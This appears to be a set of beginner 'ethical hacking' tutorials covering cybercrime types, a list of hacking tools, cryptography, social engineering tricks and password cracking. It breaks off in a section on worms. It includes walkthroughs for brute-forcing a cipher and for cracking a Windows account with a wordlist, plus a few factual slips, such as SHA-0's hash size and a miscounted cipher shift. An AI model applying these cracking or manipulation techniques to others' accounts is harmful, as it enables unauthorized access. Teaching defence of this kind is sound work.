what is Hacking? Introduction & Types
What is Hacking?
Hacking is identifying weakness in computer systems or networks to exploit its weaknesses to gain access. Example of Hacking: Using password cracking algorithm to gain access to a system
Computers have become mandatory to run a successful businesses. It is not enough to have isolated computers systems; they need to be networked to facilitate communication with external businesses. This exposes them to the outside world and hacking. Hacking means using computers to commit fraudulent acts such as fraud, privacy invasion, stealing corporate/personal data, etc. Cyber crimes cost many organizations millions of dollars every year. Businesses need to protect themselves against such attacks.
In this tutorial, we will learn-
Before we go any further, let’s look at some of the most commonly used terminologies in the world of hacking.
Who is a Hacker? Types of Hackers
A Hacker is a person who finds and exploits the weakness in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security.
Hackers are classified according to the intent of their actions. The following list classifies hackers according to their intent.
What is Cybercrime?
Cyber crime is the use of computers and networks to perform illegal activities such as spreading computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most cybercrimes are committed through the internet. Some cybercrimes can also be carried out using Mobile phones via SMS and online chatting applications.
Type of Cybercrime
The following list presents the common types of cybercrimes:
Computer Fraud: Intentional deception for personal gain via the use of computer systems.
Privacy violation: Exposing personal information such as email addresses, phone number, account details, etc. on social media, websites, etc.
Identity Theft: Stealing personal information from somebody and impersonating that person.
Sharing copyrighted files/information: This involves distributing copyright protected files such as eBooks and computer programs etc.
Electronic funds transfer: This involves gaining an un-authorized access to bank computer networks and making illegal fund transfers.
Electronic money laundering: This involves the use of the computer to launder money.
ATM Fraud: This involves intercepting ATM card details such as account number and PIN numbers. These details are then used to withdraw funds from the intercepted accounts.
Denial of Service Attacks: This involves the use of computers in multiple locations to attack servers with a view of shutting them down.
Spam: Sending unauthorized emails. These emails usually contain advertisements.
What is Ethical Hacking?
Ethical Hacking is identifying weakness in computer systems and/or computer networks and coming with countermeasures that protect the weaknesses. Ethical hackers must abide by the following rules.
Get written permission from the owner of the computer system and/or computer network before hacking.
Protect the privacy of the organization been hacked.
Transparently report all the identified weaknesses in the computer system to the organization.
Inform hardware and software vendors of the identified weaknesses.
Why Ethical Hacking?
Information is one of the most valuable assets of an organization. Keeping information secure can protect an organization’s image and save an organization a lot of money.
Hacking can lead to loss of business for organizations that deal in finance such as PayPal. Ethical hacking puts them a step ahead of the cyber criminals who would otherwise lead to loss of business.
Legality of Ethical Hacking
Ethical Hacking is legal if the hacker abides by the rules stipulated in the above section on the definition of ethical hacking. The International Council of E-Commerce Consultants (EC-Council) provides a certification program that tests individual’s skills. Those who pass the examination are awarded with certificates. The certificates are supposed to be renewed after some time.
Summary
Hacking is identifying and exploiting weaknesses in computer systems and/or computer networks.
Cybercrime is committing a crime with the aid of computers and information technology infrastructure.
Ethical Hacking is about improving the security of computer systems and/or computer networks.
Ethical Hacking is legal.
Potential Security Threats To Your Computer Systems
A computer system threat is anything that leads to loss or corruption of data or physical damage to the hardware and/or infrastructure. Knowing how to identify computer security threats is the first step in protecting computer systems. The threats could be intentional, accidental or caused by natural disasters.
In this article, we will introduce you to the common computer system threats and how you can protect systems against them.
Topics covered in this tutorial
What is a Security Threat?
Security Threat is defined as a risk that which can potentially harm computer systems and organization. The cause could be physical such as someone stealing a computer that contains vital data. The cause could also be non-physical such as a virus attack. In these tutorial series, we will define a threat as a potential attack from a hacker that can allow them to gain unauthorized access to a computer system.
What are Physical Threats?
A physical threat is a potential cause of an incident that may result in loss or physical damage to the computer systems.
The following list classifies the physical threats into three (3) main categories;
Internal: The threats include fire, unstable power supply, humidity in the rooms housing the hardware, etc.
External: These threats include Lightning, floods, earthquakes, etc.
Human: These threats include theft, vandalism of the infrastructure and/or hardware, disruption, accidental or intentional errors.
To protect computer systems from the above mentioned physical threats, an organization must have physical security control measures.
The following list shows some of the possible measures that can be taken:
Internal: Fire threats could be prevented by the use of automatic fire detectors and extinguishers that do not use water to put out a fire. The unstable power supply can be prevented by the use of voltage controllers. An air conditioner can be used to control the humidity in the computer room.
External: Lightning protection systems can be used to protect computer systems against such attacks. Lightning protection systems are not 100% perfect, but to a certain extent, they reduce the chances of Lightning causing damage. Housing computer systems in high lands are one of the possible ways of protecting systems against floods.
Humans: Threats such as theft can be prevented by use of locked doors and restricted access to computer rooms.
What are Non-physical threats?
A non-physical threat is a potential cause of an incident that may result in;
Loss or corruption of system data
Disrupt business operations that rely on computer systems
Loss of sensitive information
Illegal monitoring of activities on computer systems
Cyber Security Breaches
Others
The non-physical threats are also known as logical threats. The following list is the common types of non-physical threats;
Virus
Trojans
Worms
Spyware
Key loggers
Adware
Denial of Service Attacks
Distributed Denial of Service Attacks
Unauthorized access to computer systems resources such as data
Phishing
Other Computer Security Risks
To protect computer systems from the above-mentioned threats, an organization must have logical security measures in place. The following list shows some of the possible measures that can be taken to protect cyber security threats
To protect against viruses, Trojans, worms, etc. an organization can use anti-virus software. In additional to the anti-virus software, an organization can also have control measures on the usage of external storage devices and visiting the website that is most likely to download unauthorized programs onto the user’s computer.
Unauthorized access to computer system resources can be prevented by the use of authentication methods. The authentication methods can be, in the form of user ids and strong passwords, smart cards or biometric, etc.
Intrusion-detection/prevention systems can be used to protect against denial of service attacks.There are other measures too that can be put in place to avoid denial of service attacks.
Summary
A threat is any activity that can lead to data loss/corruption through to disruption of normal business operations.
There are physical and non-physical threats
Physical threats cause damage to computer systems hardware and infrastructure. Examples include theft, vandalism through to natural disasters.
Non-physical threats target the software and data on the computer systems.
Skills Required to Become a Ethical Hacker
Skills allow you to achieve your desired goals within the available time and resources. As a hacker, you will need to develop skills that will help you get the job done. These skills include learning how to program, use the internet, good at solving problems, and taking advantage of existing security tools.
In this article, we will introduce you to the common programming languages and skills that you must know as a hacker.
Topics covered in this tutorial
What is a programming language?
A programming language is a language that is used to develop computer programs. The programs developed can range from operating systems; data based applications through to networking solutions.
Why should you learn how to program?
Hackers are the problem solver and tool builders, learning how to program will help you implement solutions to problems. It also differentiates you from script kiddies.
Writing programs as a hacker will help you to automate many tasks which would usually take lots of time to complete.
Writing programs can also help you identify and exploit programming errors in applications that you will be targeting.
You don’t have to reinvent the wheel all the time, and there are a number of open source programs that are readily usable. You can customize the already existing applications and add your methods to suit your needs.
What languages should I learn?
The answer to this question depends on your target computer systems and platforms. Some programming languages are used to develop for only specific platforms. As an example, Visual Basic Classic (3, 4, 5, and 6.0) is used to write applications that run on Windows operating system. It would, therefore, be illogical for you to learn how to program in Visual Basic 6.0 when your target is hacking Linux based systems.
Programming languages that are useful to hackers
* Cross platform means programs developed using the particular language can be deployed on different operating systems such as Windows, Linux based, MAC etc.
Other skills
In addition to programming skills, a good hacker should also have the following skills:
Know how to use the internet and search engines effectively to gather information.
Get a Linux-based operating system and the know the basics commands that every Linux user should know.
Practice makes perfect, a good hacker should be hard working and positively contribute to the hacker community. He/she can contribute by developing open source programs, answering questions in hacking forums, etc.
Summary
Programming skills are essential to becoming an effective hacker.
Network skills are essential to becoming an effective hacker
SQL skills are essential to becoming an effective hacker.
Hacking tools are programs that simplify the process of identifying and exploiting weaknesses in computer systems.
Top 20 Tools for Ethical hacking in 2020
What are Hacking Tools?
Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution.
In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks
1) Netsparker
Netsparker is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution.
Features
Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.
Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.
REST API for seamless integration with the SDLC, bug tracking systems etc.
Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated ethical hacking solution that mimics a hacker to keep one step ahead of malicious intruders. The web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities.
Features:
Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
Detects over 1200 WordPress core, theme, and plugin vulnerabilities
Fast & Scalable – crawls hundreds of thousands of pages without interruptions
Integrates with popular WAFs and Issue Trackers to aid in the SDLC
Available On Premises and as a Cloud solution.
3) ImmuniWeb®
ImmuniWeb® AI Platform provides a full spectrum of Application Security Testing, Asset Discovery, Attack Surface Management, Dark Web Monitoring and Continuous Security Monitoring solutions tailored for DevSecOps.
With ImmuniWeb you get:
Reduced complexity and lower operations costs
Holistic visibility of your digital assets and risks
Priority-based and risk-aware testing
Full DevSecOps integration
4) SaferVPN
SaferVPN is an indispensable tool in an Ethical hackers arsenal. You may need it to check target in different geographies, simulate nonpersonalized browsing behavior, anonymized file transfers, etc.
Features:
No Log VPN with high security and anonymity
Very fast speeds with 2000+ servers across continents
Based in Hongkong, it does not store any data.
Split tunneling and 5 simultaneous logins
24/7 support
Supports Windows, Mac, Android, Linux, iPhone, etc.
300,000+ IPs
Port Forwarding, Dedicated IO and P2P Protection
31 Day Money-Back Guarantee
5) Burp Suite:
Burp Suite is a useful platform for performing Security Testing of web applications. Its various tools work seamlessly together to support the entire pen testing process. It spans from initial mapping to analysis of an application's attack surface.
Features:
It can detect over 3000 web application vulnerabilities.
Scan open-source software and custom-built applications
An easy to use Login Sequence Recorder allows the automatic scanning
Review vulnerability data with built-in vulnerability management.
Easily provide wide variety of technical and compliance reports
Detects Critical Vulnerabilities with 100% Accuracy
Automated crawl and scan
Advanced scanning feature for manual testers
Cutting-edge scanning logic
Download link: https://portswigger.net/burp/freedownload
6) Ettercap:
Ettercap is an ethical hacking tool. It supports active and passive dissection includes features for network and host analysis.
Features:
It supports active and passive dissection of many protocols
Feature of ARP poisoning to sniff on a switched LAN between two hosts
Characters can be injected into a server or to a client while maintaining a live connection
Ettercap is capable of sniffing an SSH connection in full duplex
Allows sniffing of HTTP SSL secured data even when the connection is made using proxy
Allows creation of custom plugins using Ettercap's API
Download link: https://ettercap.github.io/ettercap/downloads.html
7) Aircrack:
Aircrack is a trustable ethical hacking tool. It cracks vulnerable wireless connections. It is powered by WEP WPA and WPA 2 encryption Keys.
Features:
More cards/drivers supported
Support all types of OS and platforms
New WEP attack: PTW
Support for WEP dictionary attack
Support for Fragmentation attack
Improved tracking speed
Download link: https://www.aircrack-ng.org/downloads.html
8) Angry IP Scanner:
Angry IP Scanner is open-source and cross-platform ethical hacking tool. It scans IP addresses and ports.
Features:
Scans local networks as well as the Internet
Free and open-source tool
Random or file in any format
Exports results into many formats
Extensible with many data fetchers
Provides command-line interface
Works on Windows, Mac, and Linux
No need for Installation
Download link: http://angryip.org/download/#windows
9) GFI LanGuard:
GFI LanGuard is an ethical tool that scan networks for vulnerabilities. It can acts as your 'virtual security consultant' on demand. It allows creating an asset inventory of every device.
Features:
It helps to maintain a secure network over time is to know which changes are affecting your network and
Patch management: Fix vulnerabilities before an attack
Analyze network centrally
Discover security threats early
Reduce cost of ownership by centralizing vulnerability scanning
Help to maintain a secure and compliant network
Download link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/download
10) Savvius:
It is an ethical hacking tool. It performance issues and reduces security risk with the deep visibility provided by Omnipeek. It can diagnose network issues faster and better with Savvius packet intelligence.
Features:
Powerful, easy-to-use network forensics software
Savvius automates the capture of the network data required to quickly investigate security alerts
Software and integrated appliance solutions
Packet intelligence combines deep analysis
Rapid resolution of network and security issues
Easy to use Intuitive workflow
Expert and responsive technical support
Onsite deployment for appliances
Commitment to our customers and our products
Download link: https://www.savvius.com/distributed_network_analysis_suite_trial
11) QualysGuard:
Qualys guard helps businesses streamline their security and compliance solutions. It also builds security into their digital transformation initiatives. This tool can also check the performance vulnerability of the online cloud systems.
Features:
It is trusted globally
No hardware to buy or manage
It is a scalable, end-to-end solution for all aspects of IT security
Vulnerability data securely stored and processed on an n-tiered architecture of load-balanced servers
It sensor provides continuous visibility
Data analyzed in real time
It can respond to threats in a real-time
Download link: https://www.qualys.com/forms/freescan/
12) WebInspect:
WebInspect is automated dynamic application security testing that allows performing ethical hacking techniques. It provides comprehensive dynamic analysis of complex web applications and services.
Features:
Allows to test dynamic behavior of running web applications to identify security vulnerabilities
Keep in control of your scan by getting relevant information and statistics at a glance
Centralized Program Management
Advanced technologies, such as simultaneous crawl professional-level testing to novice security testers
Easily inform management on vulnerability trending, compliance management, and risk oversight
Download link: https://saas.hpe.com/en-us/software/webinspect
13) Hashcat:
Hashcat is a robust password cracking ethical hacking tool. It can help users to recover lost passwords, audit password security, or just find out what data is stored in a hash.
Features:
Open-Source platform
Multi-Platform Support
Allows utilizing multiple devices in the same system
Utilizing mixed device types in the same system
It supports distributed cracking networks
Supports interactive pause/resume
Supports sessions and restore
Built-in benchmarking system
Integrated thermal watchdog
Supports automatic performance tuning
Download link: https://hashcat.net/hashcat/
14) L0phtCrack:
L0phtCrack 6 is useful password audit and recovery tool. It identifies and assesses password vulnerability over local machines and networks.
Features:
Multicore & multi-GPU support helps to optimize hardware
Easy to customize
Simple Password Loading
Schedule sophisticated tasks for automated enterprise-wide password
Fix weak passwords issues by forcing password resets or locking accounts
It allows multiple auditing OSes
Download link: http://www.l0phtcrack.com/#download-form
15) Rainbow Crack:
RainbowCrack is a password cracking tool widely used for ethical hacking. It cracks hashes with rainbow tables. It uses time-memory tradeoff algorithm for this purpose.
Features:
Full time-memory trade-off tool suites, including rainbow table generation
It Support rainbow table of any hash algorithm
Support rainbow table of any charset
Support rainbow table in raw file format (.rt) and compact file format
Computation on multi-core processor support
GPU acceleration with multiple GPUs
Runs on Windows OS and Linux
Unified rainbow table file format on every supported OS
Command line user interface
Graphics user interface
Download link: http://project-rainbowcrack.com/index.htm
16) IKECrack:
IKECrack is an open source authentication crack tool. This ethical hacking tool is designed to brute-force or dictionary attack. This tool also allows performing cryptography tasks.
Features:
IKECrack is a tool that allows performing Cryptography tasks
Initiating client sends encryption options proposal, DH public key, random number, and an ID in an unencrypted packet to the gateway/responder.
It is freely available for both personal and commercial use. Therefore, it is perfect choice for user who wants an option for Cryptography programs
Download link: http://ikecrack.sourceforge.net/
17) IronWASP:
IronWASP is an open source software for ethical hacking too. It is web application vulnerability testing. It is designed to be customizable so that users can create their custom security scanners using it.
Features:
GUI based and very easy to use
It has powerful and effective scanning engine
Supports for recording Login sequence
Reporting in both HTML and RTF formats
Checks for over 25 types of web vulnerabilities
False Positives and Negatives detection support
It supports Python and Ruby
Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET
Download link: http://ironwasp.org/download.html
18) Medusa
Medusa is one of the best online brute-force, speedy, parallel password crackers ethical hacking tool. This tool is also widely used for ethical hacking.
Features:
It is designed in such a way that it is speedy, massively parallel, modular, login brute-forcer
The main aim of this tool is to support as many services which allow remote authentication
Allows to perform Thread-based parallel testing and Brute-force testing
Flexible user input. It can be specified in a variety of ways
All the service module exists as an independent .mod file.
No modifications are needed to the core application to extend the supported list of services for brute-forcing
Download link: http://foofus.net/goons/jmk/medusa/medusa.html
19) NetStumbler
NetStumbler is used to detect wireless networks on the Windows platform.
Features:
Verifying network configurations
Finding locations with poor coverage in a WLAN
Detecting causes of wireless interference
Detecting unauthorized ("rogue") access points
Aiming directional antennas for long-haul WLAN links
Download link: http://www.stumbler.net/
20) SQLMap
SQLMap automates the process of detecting and exploiting SQL Injection weaknesses. It is open source and cross platform. It supports the following database engines.
MySQL
Oracle
Postgre SQL
MS SQL Server
MS Access
IBM DB2
SQLite
Firebird
Sybase and SAP MaxDB
It supports the following SQL Injection Techniques;
Boolean-based blind
Time-based blind
Error-based
UNION query
Stacked queries and out-of-band.
Download link: http://sqlmap.org/
21) Cain & Abel
Cain & Abel is a Microsoft Operating System passwords recovery tool. It is used to -
Recover MS Access passwords
Uncover password field
Sniffing networks
Cracking encrypted passwords using dictionary attacks, brute-force, and cryptanalysis attacks.
Download link: http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
22) Nessus
Nessus can be used to perform;
Remote vulnerability scanner
Password dictionary attacks
Denial of service attacks.
It is closed source, cross platform and free for personal use.
Download link: http://www.tenable.com/products/nessus-vulnerability-scanner
Cryptography Tutorial: Cryptanalysis, RC4, CrypTool
Information plays a vital role in the running of business, organizations, military operations, etc. Information in the wrong hands can lead to loss of business or catastrophic results. To secure communication, a business can use cryptology to cipher information. Cryptology involves transforming information into the Nonhuman readable format and vice versa.
In this article, we will introduce you to the world of cryptology and how you can secure information from falling into the wrong hands.
Topics covered in this tutorial
What is Cryptography?
Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into nonhuman readable formats and vice versa.
Let’s illustrate this with the aid of an example. Suppose you want to send the message “I LOVE APPLES”, you can replace every letter in the phrase with the third successive letter in the alphabet. The encrypted message will be “K NQXG CRRNGV”. To decrypt our message, we will have to go back three letters in the alphabet using the letter that we want to decrypt. The image below shows how the transformation is done.
The process of transforming information into nonhuman readable form is called encryption.
The process of reversing encryption is called decryption.
Decryption is done using a secret key which is only known to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if the attacker manages to get the information, it will not make sense to them.
The encrypted information is known as a cipher.
What is Cryptanalysis?
Cryptanalysis is the art of trying to decrypt the encrypted messages without the use of the key that was used to encrypt the messages. Cryptanalysis uses mathematical analysis & algorithms to decipher the ciphers. The success of cryptanalysis attacks depends
Amount of time available
Computing power available
Storage capacity available
The following is a list of the commonly used Cryptanalysis attacks;
Brute force attack– this type of attack uses algorithms that try to guess all the possible logical combinations of the plaintext which are then ciphered and compared against the original cipher.
Dictionary attack– this type of attack uses a wordlist in order to find a match of either the plaintext or key. It is mostly used when trying to crack encrypted passwords.
Rainbow table attack– this type of attack compares the cipher text against pre-computed hashes to find matches.
What is cryptology?
Cryptology combines the techniques of cryptography and cryptanalysis.
Encryption Algorithms
MD5– this is the acronym for Message-Digest 5. It is used to create 128-bit hash values. Theoretically, hashes cannot be reversed into the original plain text. MD5 is used to encrypt passwords as well as check data integrity. MD5 is not collision resistant. Collision resistance is the difficulties in finding two values that produce the same hash values.
SHA– this is the acronym for Secure Hash Algorithm. SHA algorithms are used to generate condensed representations of a message (message digest). It has various versions such as;
SHA-0: produces 120-bit hash values. It was withdrawn from use due to significant flaws and replaced by SHA-1.
SHA-1: produces 160-bit hash values. It is similar to earlier versions of MD5. It has cryptographic weakness and is not recommended for use since the year 2010.
SHA-2: it has two hash functions namely SHA-256 and SHA-512. SHA-256 uses 32-bit words while SHA-512 uses 64-bit words.
SHA-3: this algorithm was formally known as Keccak.
RC4– this algorithm is used to create stream ciphers. It is mostly used in protocols such as Secure Socket Layer (SSL) to encrypt internet communication and Wired Equivalent Privacy (WEP) to secure wireless networks.
BLOWFISH– this algorithm is used to create keyed, symmetrically blocked ciphers. It can be used to encrypt passwords and other data.
Hacking Activity: Use CrypTool
In this practical scenario, we will create a simple cipher using the RC4 algorithm. We will then attempt to decrypt it using brute-force attack. For this exercise, let us assume that we know the encryption secret key is 24 bits. We will use this information to break the cipher.
We will use CrypTool 1 as our cryptology tool. CrypTool 1 is an open source educational tool for crypto logical studies. You can download it from https://www.cryptool.org/en/ct1-downloads
Creating the RC4 stream cipher
We will encrypt the following phrase
Never underestimate the determination of a kid who is time-rich and cash-poor
We will use 00 00 00 as the encryption key.
Open CrypTool 1
Replace the text with Never underestimate the determination of a kid who is time-rich and cash-poor
Click on Encrypt/Decrypt menu
Point to Symmetric (modern) then select RC4 as shown above
The following window will appear
Select 24 bits as the encryption key
Set the value to 00 00 00
Click on Encrypt button
You will get the following stream cipher
Attacking the stream cipher
Click on Analysis menu
Point to Symmetric Encryption (modern) then select RC4 as shown above
You will get the following window
Remember the assumption made is the secret key is 24 bits. So make sure you select 24 bits as the key length.
Click on the Start button. You will get the following window
Note: the time taken to complete the Brute-Force Analysis attack depends on the processing capacity of the machine been used and the key length. The longer the key length, the longer it takes to complete the attack.
When the analysis is complete, you will get the following results.
Note: a lower Entropy number means it is the most likely correct result. It is possible a higher than the lowest found Entropy value could be the correct result.
Select the line that makes the most sense then click on Accept selection button when done
Summary
Cryptography is the science of ciphering and deciphering messages.
A cipher is a message that has been transformed into a nonhuman readable format.
Deciphering is reversing a cipher into the original text.
Cryptanalysis is the art of deciphering ciphers without the knowledge of the key used to cipher them.
Cryptology combines the techniques of both cryptography and cryptanalyst
What is Social Engineering? Attacks, Techniques & Prevention
What is Social Engineering?
Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.
Knowing the tricks used by hackers to trick users into releasing vital login information among others is fundamental in protecting computer systems
In this tutorial, we will introduce you to the common social engineering techniques and how you can come up with security measures to counter them.
Topics covered in this tutorial
How social engineering Works?
HERE,
Gather Information: This is the first stage, the learns as much as he can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.
Plan Attack: The attackers outline how he/she intends to execute the attack
Acquire Tools: These include computer programs that an attacker will use when launching the attack.
Attack: Exploit the weaknesses in the target system.
Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.
Common Social Engineering Techniques:
Social engineering techniques can take many forms. The following is the list of the commonly used techniques.
Familiarity Exploit: Users are less suspicious of people they are familiar with. An attacker can familiarize him/herself with the users of the target system prior to the social engineering attack. The attacker may interact with users during meals, when users are smoking he may join, on social events, etc. This makes the attacker familiar to the users. Let’s suppose that the user works in a building that requires an access code or card to gain access; the attacker may follow the users as they enter such places. The users are most like to hold the door open for the attacker to go in as they are familiar with them. The attacker can also ask for answers to questions such as where you met your spouse, the name of your high school math teacher, etc. The users are most likely to reveal answers as they trust the familiar face. This information could be used to hack email accounts and other accounts that ask similar questions if one forgets their password.
Intimidating Circumstances: People tend to avoid people who intimidate others around them. Using this technique, the attacker may pretend to have a heated argument on the phone or with an accomplice in the scheme. The attacker may then ask users for information which would be used to compromise the security of the users’ system. The users are most likely give the correct answers just to avoid having a confrontation with the attacker. This technique can also be used to avoid been checked at a security check point.
Phishing: This technique uses trickery and deceit to obtain private data from users. The social engineer may try to impersonate a genuine website such as Yahoo and then ask the unsuspecting user to confirm their account name and password. This technique could also be used to get credit card information or any other valuable personal data.
Tailgating: This technique involves following users behind as they enter restricted areas. As a human courtesy, the user is most likely to let the social engineer inside the restricted area.
Exploiting human curiosity: Using this technique, the social engineer may deliberately drop a virus infected flash disk in an area where the users can easily pick it up. The user will most likely plug the flash disk into the computer. The flash disk may auto run the virus, or the user may be tempted to open a file with a name such as Employees Revaluation Report 2013.docx which may actually be an infected file.
Exploiting human greed: Using this technique, the social engineer may lure the user with promises of making a lot of money online by filling in a form and confirm their details using credit card details, etc.
Social Engineering Counter Measures
Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;
To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.
To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.
To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.
To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.
To counter human curiosity, it’s better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.
To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
Summary
Social engineering is the art of exploiting the human elements to gain access to un-authorized resources.
Social engineers use a number of techniques to fool the users into revealing sensitive information.
Organizations must have security policies that have social engineering countermeasures.
What is Password Cracking?
Password cracking is the process of attempting to gain Unauthorized access to restricted systems using common passwords or algorithms that guess passwords. In other words, it’s an art of obtaining the correct password that gives access to a system protected by an authentication method.
Password cracking employs a number of techniques to achieve its goals. The cracking process can involve either comparing stored passwords against word list or use algorithms to generate passwords that match
In this Tutorial, we will introduce you to the common password cracking techniques and the countermeasures you can implement to protect systems against such attacks.
Topics covered in this tutorial
What is password strength?
Password strength is the measure of a password’s efficiency to resist password cracking attacks. The strength of a password is determined by;
Length: the number of characters the password contains.
Complexity: does it use a combination of letters, numbers, and symbol?
Unpredictability: is it something that can be guessed easily by an attacker?
Let’s now look at a practical example. We will use three passwords namely
1. password
2. password1
3. #password1$
For this example, we will use the password strength indicator of Cpanel when creating passwords. The images below show the password strengths of each of the above-listed passwords.
Note: the password used is password the strength is 1, and it’s very weak.
Note: the password used is password1 the strength is 28, and it’s still weak.
Note: The password used is #password1$ the strength is 60 and it’s strong.
The higher the strength number, better the password.
Let’s suppose that we have to store our above passwords using md5 encryption. We will use an online md5 hash generator to convert our passwords into md5 hashes.
The table below shows the password hashes
We will now use http://www.md5this.com/ to crack the above hashes. The images below show the password cracking results for the above passwords.
As you can see from the above results, we managed to crack the first and second passwords that had lower strength numbers. We didn’t manage to crack the third password which was longer, complex and unpredictable. It had a higher strength number.
Password cracking techniques
There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below;
Dictionary attack– This method involves the use of a wordlist to compare against user passwords.
Brute force attack– This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.
Rainbow table attack– This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.
Guess– As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.
Spidering– Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.
Spidering sample dictionary attack wordlist
1976 <founder birth year>
smith jones <founder name>
acme <company name/initials>
built|to|last <words in company vision/mission>
golfing|chess|soccer <founders hobbies
Password cracking tool
These are software programs that are used to crack user passwords. We already looked at a similar tool in the above example on password strengths. The website www.md5this.com uses a rainbow table to crack passwords. We will now look at some of the commonly used tools
John the Ripper
John the Ripper uses the command prompt to crack passwords. This makes it suitable for advanced users who are comfortable working with commands. It uses to wordlist to crack passwords. The program is free, but the word list has to be bought. It has free alternative word lists that you can use. Visit the product website http://www.openwall.com/john/ for more information and how to use it.
Cain & Abel
Cain & Abel runs on windows. It is used to recover passwords for user accounts, recovery of Microsoft Access passwords; networking sniffing, etc. Unlike John the Ripper, Cain & Abel uses a graphic user interface. It is very common among newbies and script kiddies because of its simplicity of use. Visit the product website http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml for more information and how to use it.
Ophcrack
Ophcrack is a cross-platform Windows password cracker that uses rainbow tables to crack passwords. It runs on Windows, Linux and Mac OS. It also has a module for brute force attacks among other features. Visit the product website http://ophcrack.sourceforge.net/ for more information and how to use it.
Password Cracking Counter Measures
An organization can use the following methods to reduce the chances of the passwords been cracked
Avoid short and easily predicable passwords
Avoid using passwords with predictable patterns such as 11552266.
Passwords stored in the database must always be encrypted. For md5 encryptions, its better to salt the password hashes before storing them. Salting involves adding some word to the provided password before creating the hash.
Most registration systems have password strength indicators, organizations must adopt policies that favor high password strength numbers.
Hacking Activity: Hack Now!
In this practical scenario, we are going to crack Windows account with a simple password. Windows uses NTLM hashes to encrypt passwords. We will use the NTLM cracker tool in Cain and Abel to do that.
Cain and Abel cracker can be used to crack passwords using;
Dictionary attack
Brute force
Cryptanalysis
We will use the dictionary attack in this example. You will need to download the dictionary attack wordlist here 10k-Most-Common.zip
For this demonstration, we have created an account called Accounts with the password qwerty on Windows 7.
Password cracking steps
Open Cain and Abel, you will get the following main screen
Make sure the cracker tab is selected as shown above
Click on the Add button on the toolbar.
The following dialog window will appear
The local user accounts will be displayed as follows. Note the results shown will be of the user accounts on your local machine.
Right click on the account you want to crack. For this tutorial, we will use Accounts as the user account.
The following screen will appear
Right click on the dictionary section and select Add to list menu as shown above
Browse to the 10k most common.txt file that you just downloaded
Click on start button
If the user used a simple password like qwerty, then you should be able to get the following results.
Note: the time taken to crack the password depends on the password strength, complexity and processing power of your machine.
If the password is not cracked using a dictionary attack, you can try brute force or cryptanalysis attacks.
Summary
Password cracking is the art of recovering stored or transmitted passwords.
Password strength is determined by the length, complexity, and unpredictability of a password value.
Common password techniques include dictionary attacks, brute force, rainbow tables, spidering and cracking.
Password cracking tools simplify the process of cracking passwords.
Worm, Virus & Trojan Horse: Ethical Hacking Tutorial
Some of the skills that hackers have are programming and computer networking skills. They often use these skills to gain access to systems. The objective of targeting an organization would be to steal sensitive data, disrupt business operations or physically damage computer controlled equipment. Trojans, viruses, and worms can be used to achieve the above-stated objectives.
In this article, we will introduce you to some of the ways that hackers can use Trojans, viruses, and worms to compromise a computer system. We will also look at the countermeasures that can be used to protect against such activities.
Topics covered in this tutorial
What is a Trojan horse?
A Trojan horse is a program that allows the attack to control the user’s computer from a remote location. The program is usually disguised as something that is useful to the user. Once the user has installed the program, it has the ability to install malicious payloads, create backdoors, install other unwanted applications that can be used to compromise the user’s computer, etc.
The list below shows some of the activities that the attacker can perform using a Trojan horse.
Use the user’s computer as part of the Botnet when performing distributed denial of service attacks.
Damage the user’s computer (crashing, blue screen of death, etc.)
Stealing sensitive data such as stored passwords, credit card information, etc.
Modifying files on the user’s computer
Electronic money theft by performing unauthorized money transfer transactions
Log all the keys that a user presses on the keyboard and sending the data to the attacker. This method is used to harvest user ids, passwords, and other sensitive data.
Viewing the users’ screenshot
Downloading browsing history data
What is a worm?
A worm is a malicious computer program that replicates itself usually over a computer network. An attacker may use a worm to accomplish the following tasks;
